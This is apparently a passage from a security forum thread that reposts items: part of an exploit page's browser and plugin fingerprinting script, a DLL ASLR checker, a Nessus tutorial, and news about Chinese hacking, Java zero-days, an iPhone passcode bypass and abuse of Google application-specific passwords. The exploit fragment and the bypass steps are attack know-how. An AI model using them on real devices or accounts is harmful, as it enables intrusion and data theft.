    if ((agent.indexOf('NT 6.1') > -1)&&(agent.indexOf('MSIE 9') > -1)) os_ie_ver = "ie9w7";
    if ((agent.indexOf('NT 6.2') > -1)&&(agent.indexOf('MSIE 10') > -1)) os_ie_ver = "ie10w8";
    return os_ie_ver;
}
//
//
function CheckOfficeVersion() {
    var offver = "";
    var checka = 0;
    var checkb = 0;
    //
    try { checka = new ActiveXObject("SharePoint.OpenDocuments.4"); } catch (e) {}
    try { checkb = new ActiveXObject("SharePoint.OpenDocuments.3"); } catch (e) {}
    //
    if ((typeof checka) == "object" && (typeof checkb) == "object") offver = "Office2010";
    else if ((typeof checka) == "number" && (typeof checkb) == "object") offver = "Office2007";
    //
    return offver;
}
//
//
function JavaVersion() {
    var javver = "";
    var javaa = 0;
    //
    try { javaa = new ActiveXObject("JavaWebStart.isInstalled.1.6.0.0"); } catch (e) {}
    //
    if ((typeof javaa) == "object") javver = "Java6";
    //
    return javver;
}
//
//
function SkypeCheck() {
    var skypever = "";
    return skypever;
}
//
//
</SCRIPT>
</HTML>
Sursa: Bypassing Windows ASLR using “skype4COM” protocol handler | GreyHatHacker.NET
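For the ASLR check described at the start of this post, one convenient way to automate it is with the Python pefile module: the DYNAMICBASE (ASLR opt-in) flag lives in the PE optional header's DllCharacteristics field. The sketch below is only an illustration; the path is the Skype4COM.dll location quoted above and may differ on your system.

# Check a DLL's DllCharacteristics for the DYNAMIC_BASE (ASLR) flag.
import pefile

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040
IMAGE_DLLCHARACTERISTICS_NX_COMPAT    = 0x0100   # DEP opt-in, checked as a bonus

path = r"C:\Program Files\Common Files\Skype\Skype4COM.dll"
pe = pefile.PE(path, fast_load=True)
chars = pe.OPTIONAL_HEADER.DllCharacteristics

print(path)
print("  ASLR (DYNAMICBASE):", bool(chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE))
print("  DEP  (NXCOMPAT):   ", bool(chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT))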
  3. [h=1]In Cyberspace, New Cold War[/h][h=6]By DAVID E. SANGER[/h] [h=6]Published: February 24, 2013[/h]WASHINGTON — When the Obama administration circulated to the nation’s Internet providers last week a lengthy confidential list of computer addresses linked to a hacking group that has stolen terabytes of data from American corporations, it left out one crucial fact: that nearly every one of the digital addresses could be traced to the neighborhood in Shanghai that is headquarters to the Chinese military’s cybercommand. That deliberate omission underscored the heightened sensitivities inside the Obama administration over just how directly to confront China’s untested new leadership over the hacking issue, as the administration escalates demands that China halt the state-sponsored attacks that Beijing insists it is not mounting. The issue illustrates how different the worsening cyber-cold war between the world’s two largest economies is from the more familiar superpower conflicts of past decades — in some ways less dangerous, in others more complex and pernicious. Administration officials say they are now more willing than before to call out the Chinese directly — as Attorney General Eric H. Holder Jr. did last week in announcing a new strategy to combat theft of intellectual property. But President Obama avoided mentioning China by name — or Russia or Iran, the other two countries the president worries most about — when he declared in his State of the Union address that “we know foreign countries and companies swipe our corporate secrets.” He added: “Now our enemies are also seeking the ability to sabotage our power grid, our financial institutions and our air traffic control systems.” Defining “enemies” in this case is not always an easy task. China is not an outright foe of the United States, the way the Soviet Union once was; rather, China is both an economic competitor and a crucial supplier and customer. The two countries traded $425 billion in goods last year, and China remains, despite many diplomatic tensions, a critical financier of American debt. As Hillary Rodham Clinton put it to Australia’s prime minister in 2009 on her way to visit China for the first time as secretary of state, “How do you deal toughly with your banker?” In the case of the evidence that the People’s Liberation Army is probably the force behind “Comment Crew,” the biggest of roughly 20 hacking groups that American intelligence agencies follow, the answer is that the United States is being highly circumspect. Administration officials were perfectly happy to have Mandiant, a private security firm, issue the report tracing the cyberattacks to the door of China’s cybercommand; American officials said privately that they had no problems with Mandiant’s conclusions, but they did not want to say so on the record. That explains why China went unmentioned as the location of the suspect servers in the warning to Internet providers. “We were told that directly embarrassing the Chinese would backfire,” one intelligence official said. “It would only make them more defensive, and more nationalistic.” That view is beginning to change, though. On the ABC News program “This Week” on Sunday, Representative Mike Rogers, Republican of Michigan and chairman of the House Intelligence Committee, was asked whether he believed that the Chinese military and civilian government were behind the economic espionage. “Beyond a shadow of a doubt,” he replied. 
In the next few months, American officials say, there will be many private warnings delivered by Washington to Chinese leaders, including Xi Jinping, who will soon assume China’s presidency. Both Tom Donilon, the national security adviser, and Mrs. Clinton’s successor, John Kerry, have trips to China in the offing. Those private conversations are expected to make a case that the sheer size and sophistication of the attacks over the past few years threaten to erode support for China among the country’s biggest allies in Washington, the American business community. “America’s biggest global firms have been ballast in the relationship” with China, said Kurt M. Campbell, who recently resigned as assistant secretary of state for East Asia to start a consulting firm, the Asia Group, to manage the prickly commercial relationships. “And now they are the ones telling the Chinese that these pernicious attacks are undermining what has been built up over decades.” It is too early to tell whether that appeal to China’s self-interest is getting through. Similar arguments have been tried before, yet when one of China’s most senior military leaders visited the Joint Chiefs of Staff at the Pentagon in May 2011, he said he didn’t know much about cyberweapons — and said the P.L.A. does not use them. In that regard, he sounded a bit like the Obama administration, which has never discussed America’s own cyberarsenal. Yet the P.L.A.’s attacks are aimed largely at commercial targets. It has an interest in trade secrets like aerospace designs and wind-energy product schematics: the army is deeply invested in Chinese industry and is always seeking a competitive advantage. And so far the attacks have been cost-free. American officials say that must change. But the prescriptions for what to do vary greatly — from calm negotiation to economic sanctions and talk of counterattacks led by the American military’s Cyber Command, the unit that was deeply involved in the American and Israeli cyberattacks on Iran’s nuclear enrichment plants. “The problem so far is that we have rhetoric and we have Cyber Command, and not much in between,” said Chris Johnson, a 20-year veteran of the C.I.A. team that analyzed the Chinese leadership. “That’s what makes this so difficult. It’s easy for the Chinese to deny it’s happening, to say it’s someone else, and no one wants the U.S. government launching counterattacks.” That marks another major difference from the dynamic of the American-Soviet nuclear rivalry. In cold war days, deterrence was straightforward: any attack would result in a devastating counterattack, at a human cost so horrific that neither side pulled the trigger, even during close calls like the Cuban missile crisis. But cyberattacks are another matter. The vast majority have taken the form of criminal theft, not destruction. It often takes weeks or months to pin down where an attack originated, because attacks are generally routed through computer servers elsewhere to obscure their source. A series of attacks on The New York Times that originated in China, for example, was mounted through the computer systems of unwitting American universities. That is why David Rothkopf, the author of books about the National Security Council, wrote last week that this was a “cool war,” not only because of the remote nature of the attacks but because “it can be conducted indefinitely — permanently, even — without triggering a shooting war.
At least, that is the theory.” Administration officials like Robert Hormats, the under secretary of state for business and economic affairs, say the key to success in combating cyberattacks is to emphasize to the Chinese authorities that the attacks will harm their hopes for economic growth. “We have to make it clear,” Mr. Hormats said, “that the Chinese are not going to get what they desire,” which he said was “investment from the cream of our technology companies, unless they quickly get this problem under control.” But Mr. Rogers of the Intelligence Committee argues for a more confrontational approach, including “indicting bad actors” and denying visas to anyone believed to be involved in cyberattacks, as well as their families. The coming debate is over whether the government should get into the business of retaliation. Already, Washington is awash in conferences that talk about “escalation dominance” and “extended deterrence,” all terminology drawn from the cold war. Some of the talk is overheated, fueled by a growing cybersecurity industry and the development of offensive cyberweapons, even though the American government has never acknowledged using them, even in the Stuxnet attacks on Iran. But there is a serious, behind-the-scenes discussion about what kind of attack on American infrastructure — something the Chinese hacking groups have not seriously attempted — could provoke a president to order a counterattack. Sursa: http://www.nytimes.com/2013/02/25/world/asia/us-confronts-cyber-cold-war-with-china.html?_r=0
  4. Using Nessus for Network Scanning Posted by: InfoSec Institute February 25, 2013 in Tutorials
If you are looking for a vulnerability scanner, you might have come across several expensive commercial products and tools with a wide range of features and benefits. If a free, full-featured vulnerability scanner is on your mind, then it’s time you knew about Nessus. This article covers installation, configuration, selecting policies, starting a scan, and analyzing the reports using the NESSUS Vulnerability Scanner.
Nessus was created by Renaud Deraison in 1998 to provide the Internet community with a free remote security scanner. It is one of the full-fledged vulnerability scanners that allow you to detect potential vulnerabilities in systems. Nessus is the world’s most popular vulnerability scanning tool and is supported by most research teams around the world. The tool is free of cost for personal use in a non-enterprise environment. Nessus uses a web interface to set up, scan, and view reports. It has one of the largest vulnerability knowledge bases available; because of this KB, the tool is very popular.
Key features:
* Identifies vulnerabilities that allow a remote attacker to access sensitive information from the system
* Checks whether the systems in the network have the latest software patches
* Tries default and common passwords on system accounts
* Configuration audits
* Vulnerability analysis
* Mobile device audits
* Customized reporting
For more details on the features of Nessus, visit: Nessus Vulnerability Scanner Features | Tenable Network Security.
Operating systems that support Nessus: Microsoft Windows XP/Vista/7, Linux, Mac OS X (10.5 and higher), FreeBSD, Sun Solaris, and many more.
Installation and configuration
You can download the Nessus home feed (free) or professional feed from the following link: Nessus Vulnerability Scanner | Tenable Network Security. Once you download the Nessus tool, you need to register with the official Nessus website to generate the activation key, which is required to use the tool. You can do it from the following link: (Obtain an Activation Code | Tenable Network Security). Click on “Nessus for Home” and enter the required details. An e-mail with an activation key will be sent to your mail.
[*] Install the tool. (Installation of the Nessus tool can be quite confusing, so the tutorials are useful.) For installation guidelines go to: (http://static.tenable.com/documentation/nessus_5.0_installation_guide.pdf). Check for your operating system and follow the steps mentioned in the PDF.
[*] Open Nessus in the browser; normally it runs on port 8834 (http://localhost:8834/WelcomeToNessus-Install/welcome). Follow the on-screen instructions.
[*] Create an account with Nessus.
[*] Enter the activation code you obtained by registering with the Nessus website. You can also configure a proxy if needed by giving the proxy hostname, proxy username, and password.
[*] The scanner then gets registered with Tenable and creates a user.
[*] Download the necessary plug-ins. (It takes some time to download the plug-ins; while you are watching the screen, you can go through the vast list of resources available for Nessus users.)
Once the plug-ins are downloaded, it will automatically redirect you to a login screen. Provide the username and password that you created earlier to log in.
Running the tool: Nessus gives you lots of choices when it comes to running the actual vulnerability scan.
You’ll be able to scan individual computers, ranges of IP addresses, or complete subnets. There are over 1,200 vulnerability plug-ins with Nessus, which allow you to specify an individual vulnerability or a set of vulnerabilities to test for. In contrast to other tools, Nessus won’t assume that specific services run on common ports; instead, it will try to exploit the vulnerabilities.
Among the foundations for discovering vulnerabilities in the network are:
* Knowing which systems exist
* Knowing which ports are open and which listening services are available on those ports
* Determining which operating system is running on the remote machine
Once you log in to Nessus using the web interface, you will be able to see various options, such as:
* Policies – where you configure the options required for a scan
* Scans – for adding different scans
* Reports – for analyzing the results
The basic workflow of the Nessus tool is to log in, create or configure the policy, run the scan, and analyze the results.
Policies
Policies are the vulnerability tests that you can perform on the target machine. By default, Nessus has four policies.
Figure (A) shows the default policies that come with the Nessus tool.
External network scan: This policy is preconfigured so that Nessus scans externally-facing hosts that provide services to the host. It scans all 65,535 ports of the target machine. It is also configured with the plug-ins required for web application vulnerability tests such as XSS.
Internal network scan: This policy is configured to scan large internal networks with many hosts, services, embedded systems like printers, etc. This policy scans only standard ports instead of scanning all 65,535 ports.
Web app tests: Nessus uses this policy to detect different types of vulnerabilities existing in web applications. It has the capability to spider the entire website to discover the content and links in the application. Once the spidering process has been completed, Nessus starts to discover the vulnerabilities that exist in the application.
Prepare for PCI DSS audits: This policy has PCI DSS (Payment Card Industry Data Security Standard) checks enabled. Nessus compares the results with the standard and produces a report for the scan. The scan doesn’t guarantee a secure infrastructure. Industries or organizations preparing for PCI DSS can use this policy to prepare their network and systems.
Apart from these pre-configured policies, you can also upload a policy by clicking on “Upload”, or configure your own policy for your specific scan requirements by clicking on “New Policy.”
Configuring the policy:
* Click on the Policies tab at the top of the screen.
* Click on the New Policy button to create a new policy.
* Under the General settings tab, select the “setting type” based on the scan requirement, such as Port Scanning, Performance Scanning, etc. Based on this type, Nessus prompts you for different options to be selected. For example, “Port Scanning” has the following options:
Figure (B) shows the configuration options for Port Scanning.
* Enter the port scan range. By default, Nessus scans all the TCP ports in the /etc/services file. You can limit the ports by specifying them manually (for example, 20-30).
* You have different scanners available, such as the Nessus SNMP scanner, SSH scanner, ping remote host, TCP scanner, SYN scanner, etc. Enable them by checking the corresponding check boxes as per the scan requirements.
* Enter the credentials for the scan to use.
You can use a single set of credentials or multiple sets of credentials if you have to. You can also proceed without entering any credentials.
The Plug-ins tab lists a number of plug-ins. By default, Nessus has all the plug-ins enabled. You can enable or disable all the plug-ins at once, or enable a few from a plug-in family as per the scan you’d like to perform. You can also disable some unwanted plug-ins from a plug-in family by clicking on that particular plug-in.
Figure (C) shows the sub-plug-ins for the Backdoors plug-in family. In Figure (C), green indicates the parent plug-in and blue indicates the sub-plug-ins, that is, the plug-ins under the parent plug-in (Backdoors). You can enable or disable them by simply clicking on the Enabled button.
In Policy Preferences, you are provided with a drop-down box to select different types of plug-ins. Select the plug-in based on the scan requirement and specify the settings as per the plug-in requirement. Click “Finish” once completed. For example: configure the database.
Figure (D) shows the configuration of the database settings plug-in.
Scans
Once you are done configuring the policies as per your scan requirements, you need to configure the scan details properly. You can do this under the Scan tab, where you can create a new scan by clicking “New Scan” at the top right. A pop-up then appears where you need to enter the details, such as Scan Name, Scan Type, Scan Policy, and Target.
* Scan Name: The name that you want to give to the scan.
* Scan Type: You have the option to run the scan immediately by selecting “RUN NOW”, or you can make a template which you can launch later when you want to run the scan. All templates are moved under the Template tab beside the Scan tab.
* Scan Policy: Select the policy that you configured previously in the Policies section.
* Select Target: Enter the target machine that you are planning to test. Depending upon the targets, Nessus takes time to scan them.
Results
Once the scanning process has completed successfully, the results can be analyzed. You can see the name of the scan under the Results section. Click on the name to see the report.
* Hosts – Specifies all the target systems you have scanned.
* Vulnerabilities – Displays all the vulnerabilities on the target machine that has been tested.
* Export Results – You can export the results into various formats such as HTML, PDF, etc. You can also select an individual section or the complete result to export, based on your requirement (a short sketch for parsing an exported report follows at the end of this article).
Let us try an example now. I have configured a policy named “Basic Scan.” We have many options while configuring or building the policy, such as port scanners, performance of the tool, advanced settings, etc.
Figure (E) shows the configuration settings of Port Scanning for the policy “Basic Scan.”
You don’t need credentials now, so skip the Credentials tab and move to the Plug-ins tab. You need to configure the specific plug-ins as per the requirements of the scan that you want to perform on the remote machine.
Figure (F) shows the plug-ins I have enabled for the policy “Basic Scan.” I have enabled a few plug-ins for the Windows machine scan.
Figure (G) shows configuring the scan. I have configured the scan to run instantly with the policy that I created earlier.
And the scan target specifies the IP address I want to scan. Once all the details have been entered, click on Create Scan, which shows that the scan is running, as shown in Figure (H) below.
Once the scanning has completed, you can see the results in the Results tab; Figure (I) shows this. Double-clicking on the title displays the scan results.
Figure (J) shows the Hosts details. It includes all the targets that you have scanned during the test. Double-clicking on the host address displays the vulnerabilities Nessus has identified during the test. You can also click on the Vulnerabilities tab to check out the vulnerabilities.
Figure (K) shows the vulnerabilities that Nessus found during its scan. Nessus marks the risk as high, medium, info, etc. Clicking on a vulnerability gives you a brief description of it. For example, let us go with the Netstat port scanner, which displays the following information:
Figure (L) shows the ports open on the target machine.
In the same manner you can analyze the complete details by clicking on the vulnerabilities. Nessus also suggests solutions or remedies for the vulnerabilities, with a few references.
Conclusion
Nessus is a tool that automates the process of scanning the network and web applications for vulnerabilities. It also suggests solutions for the vulnerabilities that are identified during the scan.
Kamal B is a security researcher for InfoSec Institute. InfoSec Institute is an information security training company that offers popular CEH v8 Ethical Hacking Boot Camps.
References
http://static.tenable.com/documentation/nessus_5.0_installation_guide.pdf
http://static.tenable.com/documentation/nessus_5.0_HTML5_user_guide.pdf
http://static.tenable.com/documentation/WhatIsNewNessus5.pdf
Sursa: Using Nessus for Network Scanning | ZeroSecurity
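Once a report has been exported (the Export Results option mentioned above), it can also be post-processed outside the web UI. The sketch below assumes the standard .nessus (v2) XML export layout with ReportHost/ReportItem elements and simply prints findings grouped by severity; the filename is a placeholder for whatever you saved from the Results tab.

# Summarize an exported .nessus (v2 XML) report by severity (illustration only).
import xml.etree.ElementTree as ET
from collections import defaultdict

SEVERITY_LABELS = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

def summarize(path):
    tree = ET.parse(path)
    by_severity = defaultdict(list)
    for host in tree.iter("ReportHost"):
        hostname = host.get("name", "unknown")
        for item in host.iter("ReportItem"):
            sev = int(item.get("severity", "0"))
            by_severity[sev].append((hostname, item.get("port"), item.get("pluginName")))
    for sev in sorted(by_severity, reverse=True):
        print("== %s (%d findings) ==" % (SEVERITY_LABELS.get(sev, sev), len(by_severity[sev])))
        for hostname, port, plugin in by_severity[sev]:
            print("  %s:%s  %s" % (hostname, port, plugin))

if __name__ == "__main__":
    summarize("basic_scan_export.nessus")     # placeholder export filename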
  5. [h=1]Another iPhone Passcode Bypass Vulnerability Discovered[/h]by Christopher Brook February 25, 2013, 7:00AM It’s getting hard to keep track of all the bugs piling up for Apple’s iPhone. Now it seems a glitch in the iOS kernel of Apple’s much maligned iOS 6.1 is responsible for yet another passcode bypass vulnerability, the second to surface this month. Attackers can apparently access users' photos, contacts and more by following a series of steps on an iPhone running iOS 6.1. The vulnerability was detailed in a post on the Full Disclosure mailing list late last week by Benjamin Kunz Mejri, founder and CEO of Vulnerability Lab. Similar to the earlier iPhone passcode vulnerability, the exploit involves manipulating the phone’s screenshot function, its emergency call function and its power button. Users can make an emergency call (911 for example) on the phone and then cancel it while toggling the power on and off to get temporary access to the phone. A video accompanying the advisory shows a user flipping through the phone’s voicemail list and contacts list while holding down the power button. From there an attacker could get the phone’s screen to turn black before it can be connected to a computer via a USB cord. The device’s photos, contacts and more “will be available directly from the device hard drive without the pin to access,” according to the advisory. The first half of the exploit borrows heavily from last week’s vulnerability – and the Lab notes this in the caption of the video that documents its proof of concept (“already release by other researcher”). It’s the second bypass – which can be achieved by holding down the power button, the screenshot button and the emergency button – that’s interesting, as it makes the phone’s screen, minus the top bar, go black. From there it can be plugged into a computer and the information can be harvested via iTunes from the phone’s hard drive with read/write access. In the accompanying video, the phone’s images and address book can be viewed on a PC without the user having to enter the phone’s passcode, thanks to iTunes’ iPhone sync function. Apple updated iOS 6.1 to 6.1.2 earlier this week but failed to address the recent passcode bug, instead opting to patch an Exchange calendar bug that had long affected users’ phones’ network activity and battery life. Last week representatives from Apple told Wall Street Journal’s AllThingsD they were aware of the first passcode bug and were developing a fix for "a future software update.” Sursa: Another iPhone Passcode Bypass Vulnerability Discovered | threatpost
  6. CyberSecurity for the Next Generation: CIS Winners Named! February 25, 2013 Kaspersky Team Three young researchers have made their mark on the cybersecurity world and will now present their work at the final of the ‘CyberSecurity for the Next Generation’ student conference in London. The winning entries were selected from 14 research papers presented in person by their authors at the State Engineering University of Armenia. A jury of university lecturers, IT specialists and Kaspersky Lab experts named Vahram Hrayr Darbinyan’s work “Detecting DDoS attacks on digital publication hosting services” the best. The prize for the research with the greatest practical value went to Maxim Shudrak’s “A new technique and tool for vulnerabilities detection in binary executables”. Vladimir Hovsepyan’s research study “Web application for investigation and analysis of asymmetric cryptographic algorithms” received the award for innovation and originality. The jury also awarded several special prizes for the quality of presentation, social significance of the research, etc. The winners all expressed their delight and surprise with their success, and will be looking to develop their presentation and English language skills between now and the grand finale. Maxim even promised to take an intensive course of English. Congratulations to the winners and best wishes for the final! Even those who didn’t win agreed that participation was very useful – having gained valuable experience and made some interesting new acquaintances. See for yourself in this album: Sursa: CyberSecurity for the Next Generation: CIS Winners Named!
  7. [h=1]ISPs Now Monitoring for Copyright Infringement[/h] By David Kravets 02.25.13 2:04 PM The nation’s major internet service providers on Monday said they are beginning to roll out an initiative to disrupt internet access for online copyright scofflaws. The so-called “Copyright Alert System” is backed by the President Barack Obama administration and was pushed heavily by record labels and Hollywood studios. The plan, more than four years in the making, includes participation by AT&T, Cablevision Systems, Comcast, Time Warner Cable and Verizon. Others could soon join. After four offenses, the historic plan calls for these residential internet providers to initiate so-called “mitigation measures” (.pdf) that might include reducing internet speeds and redirecting a subscriber’s service to an “educational” landing page about infringement. The plan does not prevent content owners from suing internet subscribers. The Copyright Act allows damages of up to $150,000 per infringement. The Center for Copyright Information, the new group running the program, maintains it is not designed to terminate online accounts for repeat offenders. However, the Digital Millennium Copyright Act demands that internet service providers kick off repeat copyright scofflaws. The program monitors peer-to-peer file-sharing services via internet snoop MarkMonitor of San Francisco. The surveillance was to have been deployed sooner. But the various delays included Hurricane Sandy and ISP reluctance to join. Peer-to-peer monitoring is easily detectable. That’s because IP addresses of internet customers usually reveal themselves during the transfer of files. Cyberlockers, e-mail attachments, shared Dropbox folders and other ways to infringe are not included in the crackdown. To be sure, the deal is not as draconian as it could have been. The agreement, heavily lobbied for by the Recording Industry Association of America and the Motion Picture Association of America, does not require internet service providers to filter copyrighted material transiting their networks. U.S. internet service providers and the content industry have openly embraced that kind filtering. The Federal Communications Commission, in crafting its net neutrality rules, has all but invited the ISPs to practice it. On a scofflaw’s first offense, internet subscribers will receive an e-mail “alert” from their ISP saying the account may have been misused for online content theft. On the second offense, the alert might contain an “educational message” about the legalities of online file sharing. On the third and fourth infractions, the subscriber will likely receive a pop-up notice “asking the subscriber to acknowledge receipt of the alert.” Sursa: ISPs Now Monitoring for Copyright Infringement | Threat Level | Wired.com
  8. [h=1]Two More Java Zero Days Found by Polish Research Team[/h]by Christopher Brook February 25, 2013, 3:26PM The seemingly endless list of critical zero day bugs found in Java grew longer today with news that one of the flaws fixed in Oracle’s recent patches for the product is under attack and when that bug is paired with another, separate vulnerability, the sandbox in the latest build of Java can be bypassed.Polish security firm Security Explorations sent details regarding the two vulnerabilities, “issue 54” and “issue 55,” including proof of concept code, to Oracle for review today. Oracle confirmed it has received the information, according to an update to Security Explorations’s bug reporting status page but has not confirmed the flaws. Very little of the attack was officially disclosed by the company but CEO Adam Gowdiak did acknowledge that the vulnerability only affects Java’s SE 7 software – which saw Update 15 released last Tuesday – and according to reports, stems from a problem with Java Reflection API. Gowdiak and his team at Security Explorations have proved adept at finding holes in the much maligned Java over the past year or so. The company previously developed a sandbox escape for versions 5, 6, and 7 of the software last fall before advocating for the removal of the framework. The latest Java vulnerability is apparently unrelated to a separate vulnerability Gowdiak found last fall that Oracle claimed it would wait until February to fix that could’ve given an attacker free reign over a user’s computer by using a malicious Java applet. It’s possible though that the flaw could be related to a similar Java security sandbox bypass technique that was unearthed by Gowdiak in January after Java pushed Update 11 of the product. According to Softpedia, Gowdiak claimed he tested the flaw in the first release of Java 7, along with Updates 11 and 15. In January, Esteban Guillardoy of Immunity Inc., said “attackers could pair that vulnerability with the reflection API with recursion in order to bypass Java security checks.” Apple, Facebook, Microsoft and other high profile companies made headlines last week after acknowledging that a Java vulnerability left the companies open to attack via iPhoneDevSDK, a forum that was hosting malware that was being spread by malicious JavaScript. Sursa: Two More Java Zero Days Found by Polish Research Team | threatpost
  9. INTERVIEW Costin Raiu, the man who gets up close with viruses: "If Red October were a woman, she would be complicated and would speak Russian perfectly"
18 February 2013, 20:39

"Adevărul" spoke with Costin Raiu, Director of Research and Analysis at Kaspersky, about how viruses have changed in recent years and about the cyber threats we could face in 2013.

Costin Raiu, Director of Research and Analysis at the security firm Kaspersky, believes that Romania is on the right track when it comes to cyber security and welcomes the new Cyber Security Strategy approved this month by the CSAT. The analyst explained for "Adevărul" how the Red October virus operated and drew attention to a new, complex attack that exploits a vulnerability in Adobe Reader.

What exactly did the Red October virus do?
The most interesting thing about Red October is the victims. Most of them were diplomatic and government institutions, energy companies – including nuclear energy – scientific research institutions, military contractors and firms in the oil and gas industry. The attacks began in May 2007 and were focused on extracting information from the victims, information that could provide geostrategic advantages. For example, conversations between embassies and confidential information from various institutions were obtained. It is interesting that the attack went undetected for so many years. Many people saw fragments of the puzzle.

If Red October were a woman, how would you describe her?
Tall, complicated, and she speaks Russian perfectly. She prefers diplomat cake, but also energy-bar snacks. She has an affinity for rare Chinese accessories and travels a lot in Eastern Europe.

Last week one of the biggest attacks was carried out through the Adobe Reader program. What can you tell me about it?
It kept me up at night. It is not an ordinary attack, it is an extraordinarily sophisticated attack of the kind that appears about once a year. One vulnerability allows the hackers to copy files onto the system, and a second one allows them to escape the sandbox. Adobe Reader has a kind of sandbox that blocks access to the system. Whoever carried out the attack is extremely experienced. There is code that checks that it runs on systems with Adobe Reader in Arabic, Hebrew, English and Greek. We do not yet know the effect. Our conclusion is that we are dealing with a state-sponsored attack of the highest level. The investment was enormous.

Do you think Romania is prepared to defend itself against such cyber attacks?
It is interesting that Red October was detected in Romania. The Cyber Security Strategy, which brings a lot of good measures, was recently approved by the CSAT. The state does not have enough financial resources to analyse such attacks, nor experts of the same level as the people who make a living from this. The best measure in this strategy is that it encourages collaboration between the public and the private sectors.

Two weeks ago the European Commission announced a new cyber security strategy. Do you think the measure came too late?
It was not taken too late, it was taken at the right time. We analysed the proposal and it looks very good to me. I noticed there as well that it encourages the formation of response teams and encourages collaboration with the private sector.

Do you think the next World War will be fought by cyber means?
The war is already being fought by cyber means. If we look at the current conflicts, we see two major components. On one side there are the drones: thousands of drones are starting to replace infantry and aircraft. I have read that the Pentagon is training more drone pilots than aircraft pilots. Then there is the cyber component. Here we only see certain tips of the iceberg. We know something is happening, but we do not know exactly what. Examples would be the Flame, Gauss, Duqu and Stuxnet viruses. In 2012 this exploded, and we saw states declare that they are increasing their investments in the cyber-warfare component. It is cheaper and offers advantages such as anonymity, and the effects can be at least as devastating, without loss of human life.

http://www.youtube.com/watch?v=t6Qc_-EaaU8&feature=player_embedded

What should we expect in 2013, and what is Kaspersky's strategy?
We will see more and more high-level attacks, sponsored by state actors. We will see more attacks on Mac, but also on Android. We are also seeing a rise in the number of attacks that use cryptographic elements. These matter because we are already moving towards so-called "e-government", and such attacks can have huge effects on government systems. We will also see an increase in the number of "zero-day" attacks, which rely on exploiting vulnerabilities in certain programs.

What is the most dangerous type of malware?
From the point of view of the ordinary user there are two big classes: trojans that can steal banking information, and ransomware – trojans that lock the computer and demand money to unlock it. I met a person who told me how he had downloaded a fake antivirus. After a scan with that program he was told he had 30 viruses; he clicked "clean" and a message appeared saying the free version cannot remove viruses. After buying the pro version, every problem disappears. I do not advise people to pay in such cases, because it can be fixed easily. From an institutional perspective, we have attacks based on economic espionage and on sabotage of critical infrastructure. We are seeing more and more cases. We have seen Stuxnet and Red October – espionage sponsored by a state actor.

Finally, how did the viruses of 10-15 years ago compare with those of today?
A very good example is the "Bad Sectors 3428" virus, which I analysed in one night. If you printed the source of a virus from 1994, it fit on 2-3 pages. It could be analysed in a reasonable amount of time. As I analysed more viruses, my speed increased: instead of a night, it took me an hour, then 15 minutes, then 5 minutes. Nowadays the situation has changed enormously. It is very difficult for one person to analyse a virus from 2012-2013 alone; it takes a team of people. If we were to print the source of such a virus, it would run to several hundred thousand pages. The complexity has grown enormously, and so has the number of viruses. If in 1996 a new virus appeared every week or every month, today we see 200,000 new viruses per day.

Who is Costin Raiu?
Costin Raiu is one of the most prominent cyber-security experts, with over 18 years of experience in the field. The first antivirus he wrote, in 1994, was taken over by the company GeCAD and sold under the name RAV. Since 2001 Costin Raiu has worked at Kaspersky, and since 2010 he has led the Global Research & Analysis Team, which handles the analysis of the newest threats and the development of solutions against them. Tomorrow, discover more details about the viruses that can affect our personal computers, and other fascinating parts of the full interview with Kaspersky specialist Costin Raiu.

Sursa: INTERVIU Costin Raiu, omul care intră în intimitatea virușilor: „Dacă Octombrie Roșu ar fi femeie, ar fi complicată și ar vorbi limba rusă la perfecție“ | adevarul.ro
  10. Bypassing Google’s Two-Factor Authentication By Adam Goodman on February 25, 2013 TL;DR – An attacker can bypass Google’s two-step login verification, reset a user’s master password, and otherwise gain full account control, simply by capturing a user’s application-specific password (ASP). (With all due respect to Google’s “Good to Know” ad campaign) Abusing Google’s (not-so-) Application-Specific Passwords Google’s 2-step verification makes for an interesting case study in some of the challenges that go with such a wide-scale, comprehensive deployment of strong authentication. To make 2-step verification usable for all of their customers (and to bootstrap it into their rather expansive ecosystem without breaking everything), Google’s engineers had to make a few compromises. In particular, with 2-step verification came a notion of “Application-Specific Passwords” (ASPs). Some months ago, we found a way to (ab)use ASPs to gain full control over Google accounts, completely circumventing Google’s 2-step verification process. We communicated our findings to Google’s security team, and recently heard back from them that they had implemented some changes to mitigate the most serious of the threats we’d uncovered. Here’s what we found: Application-Specific Passwords Generally, once you turn on 2-step verification, Google asks you to create a separate Application-Specific Password for each application you use (hence “Application-Specific”) that doesn’t support logins using 2-step verification. Then you use that ASP in place of your actual password. In more-concrete terms, you create ASPs for most client applications that don’t use a web-based login: email clients using IMAP and SMTP (Apple Mail, Thunderbird, etc.); chat clients communicating over XMPP (Adium, Pidgin, etc.), and calendar applications that sync using CalDAV (iCal, etc.). Even some of Google’s own software initially required you to use ASPs – e.g. to enable Chrome’s sync features, or to set up your Google account on an Android device. More recently, these clients have generally shifted to using methods along the lines of OAuth. In this model, when you first log in using a new application or device, you get an authorization prompt — including 2-step verification — in a webview; after a successful login, Google’s service returns a limited-access “token”, which is used to authenticate your device/application in the future. Actually, OAuth-style tokens and ASPs are notionally very similar — in each case, you end up creating a unique authorization token for each different device/application you connect to your Google account. Further, each token can be individually revoked without affecting the others: if you lose your smartphone, you can make sure that it no longer has access to your GMail account without having to memorize a new password. So then, the major differences between OAuth tokens and ASPs are: OAuth tokens are created automatically, while ASPs are a thoroughly manual affair. You have to log into Google’s account settings page to create one, and then transcribe (or copy/paste) it into your application. OAuth tokens use a flexible authorization model, and can be restricted to accessing only certain data or services in your account. By contrast, ASPs are — in terms of enforcement — not actually application-specific at all! This second point deserves some more attention. 
